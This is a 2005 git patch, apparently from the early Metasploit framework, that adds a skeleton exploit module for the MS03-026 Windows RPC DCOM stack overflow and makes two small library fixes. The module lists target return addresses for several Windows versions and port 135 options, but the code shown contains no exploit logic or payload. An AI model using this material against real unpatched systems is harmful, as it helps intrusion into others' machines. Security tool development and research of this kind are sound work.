From 04a9cbd7ad9bd16709daf9ff062f7215dc6f8888 Mon Sep 17 00:00:00 2001
From: Matt Miller <mmiller@hick.org>
Date: Sun, 5 Jun 2005 04:37:48 +0000
Subject: [PATCH] moved

git-svn-id: file:///home/svn/incoming/trunk@2575 4d416f70-5f16-0410-b530-b9f4589650da
---
 lib/msf/core/exploit.rb                       |  1 +
 lib/rex/socket/ssl_tcp.rb                     |  1 +
 .../exploits/windows/msrpc_dcom_ms03_026.rb   | 51 +++++++++++++++++++
 3 files changed, 53 insertions(+)
 create mode 100644 modules/exploits/windows/msrpc_dcom_ms03_026.rb

diff --git a/lib/msf/core/exploit.rb b/lib/msf/core/exploit.rb
index 89a163b4a8..22409fe683 100644
--- a/lib/msf/core/exploit.rb
+++ b/lib/msf/core/exploit.rb
@@ -223,6 +223,7 @@ end
 #
 ###
 class RemoteExploit < Exploit
+
 	def exploit_type
 		Exploit::Type::Remote
 	end
diff --git a/lib/rex/socket/ssl_tcp.rb b/lib/rex/socket/ssl_tcp.rb
index 14e7539c36..fb0b7f1e63 100644
--- a/lib/rex/socket/ssl_tcp.rb
+++ b/lib/rex/socket/ssl_tcp.rb
@@ -69,6 +69,7 @@ class Rex::Socket::SslTcp < Rex::Socket::Tcp
 
 	def close
 		sslsock.close
+		sock.close
 	end
 
 	def has_read_data?(timeout = nil)
diff --git a/modules/exploits/windows/msrpc_dcom_ms03_026.rb b/modules/exploits/windows/msrpc_dcom_ms03_026.rb
new file mode 100644
index 0000000000..f6602ea9b6
--- /dev/null
+++ b/modules/exploits/windows/msrpc_dcom_ms03_026.rb
@@ -0,0 +1,51 @@
+require 'Msf/Core'
+
+module Msf
+module Exploits
+module Remote
+
+class MSRPC_DCOM_MS03_026 < Msf::RemoteExploit
+
+	def initialize
+		super(
+			'Name'          => 'Microsoft RPC DCOM MSO3-026',
+			'Description'   => 	
+				"This module exploits a stack overflow in the RPCSS service, this vulnerability" +
+				"was originally found by the Last Stage of Delirium research group and has been" +
+				"widely exploited ever since. This module can exploit the English versions of " +
+				"Windows NT 4.0 SP3-6a, Windows 2000, Windows XP, and Windows 2003 all in one request :)",
+			'Author'        => [ 'hdm', 'spoonm' ],
+			'Version'       => '$Revision$',
+			'Refs'          =>
+				[
+					[ 'OSVDB', '2100'     ],
+					[ 'MSB',   'MS03-026' ],
+				],
+			'Targets'       => 
+				[
+					# Target 0: Universal
+					[ 
+						'Windows NT SP3-6a/2000/XP/2003 Universal',
+						[ 'winnt', 'win2000', 'winxp', 'win2003' ],
+						0x74ff16f3, # Windows NT 4.0 SP3/4 (pop pop ret) rnr20.dll
+						0x776a240d, # Windows NT 4.0 SP5 (eax) ws2help.dll
+						0x77f33723, # Windows NT 4.0 SP6a (esp)
+						0x7ffde0eb, # Windows 2000 writable address + jmp+0xe0
+						0x0018759f, # Windows 2000 Universal (ebx)
+						0x01001c59, # Windows XP | XP SP0/SP1 (pop/pop/ret)
+						0x001b0b0b, # Windows 2003 call near [ebp+0x30] (unicode.nls)
+					]
+				],
+			'DefaultTarget' => 0,
+			'Options'       =>
+				[
+					Opt::RHOST,
+					Opt::RPORT(135)
+				])
+	end
+
+end
+
+end
+end
+end